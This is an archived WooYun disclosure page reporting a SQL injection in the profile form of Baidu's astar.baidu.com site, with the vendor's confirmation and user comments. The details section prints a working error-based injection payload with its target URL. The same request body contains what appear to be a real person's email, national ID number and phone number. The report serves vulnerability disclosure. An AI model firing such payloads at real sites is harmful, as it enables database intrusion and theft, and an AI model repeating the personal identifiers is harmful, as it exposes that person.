当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07069

漏洞标题:百度之星post注入

相关厂商:百度

漏洞作者: FlyR4nk

提交时间:2012-05-13 20:44

修复时间:2012-06-27 20:45

公开时间:2012-06-27 20:45

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-13: 细节已通知厂商并且等待厂商处理中
2012-05-14: 厂商已经确认,细节仅向厂商公开
2012-05-24: 细节向核心白帽子及相关领域专家公开
2012-06-03: 细节向普通白帽子公开
2012-06-13: 细节向实习白帽子公开
2012-06-27: 细节向公众公开

简要描述:

主页对post上去的数据没有过滤存在,具体是data[address]没有过滤。

详细说明:

用burpsuit等提交post数据如下:
data%5baddress%5d='and(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and'&data%5bauthor%5d=%e7%8e%8b%e6%b3%bd%e9%a2%96&data%5bbirth%5d=19910829&data%5bbiyetime%5d=2013&data%5bemail%5d=wzyalive%40gmail.com&data%5bidcard%5d=510104199108291068&data%5bjianjie%5d=01%2f01%2f1967&data%5blanguage1%5d=c&data%5blanguage2%5d=java&data%5bmobile%5d=15210602973&data%5bschoolid%5d=40054&data%5bsex%5d=%e7%94%b7&data%5bspecialityid%5d=80601&data%5bxueli%5d=%e6%9c%ac%e7%a7%91&data%5bzipcode%5d=100083&dosubmit=1
提交url为POST /index.php?act=profile&mod=cms HTTP/1.1 host:astar.baidu.com
可以得到数据库用户信息
通过逐一变换语句得到想要的信息。不在累述

漏洞证明:

修复方案:

你懂得!

版权声明:转载请注明来源 FlyR4nk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2012-05-14 15:27

厂商回复:

感谢提交~~

最新状态:

2012-05-14:。。 点的是确认 给了12分 怎么变成忽略了。。。。


漏洞评价:

评论

  1. 2012-06-13 19:27 | colgator ( 路人 | Rank:21 漏洞数:2 | xxoo,搞基比较好)

    话说,这个工具是啥???

  2. 2012-06-15 14:22 | FlyR4nk ( 普通白帽子 | Rank:119 漏洞数:18 )

    @baidu求礼物!!!

  3. 2012-12-17 21:57 | 猴子 ( 路人 | Rank:19 漏洞数:5 | 我是一只骚猴子)

    @colgator BurpSuit ,你个屌丝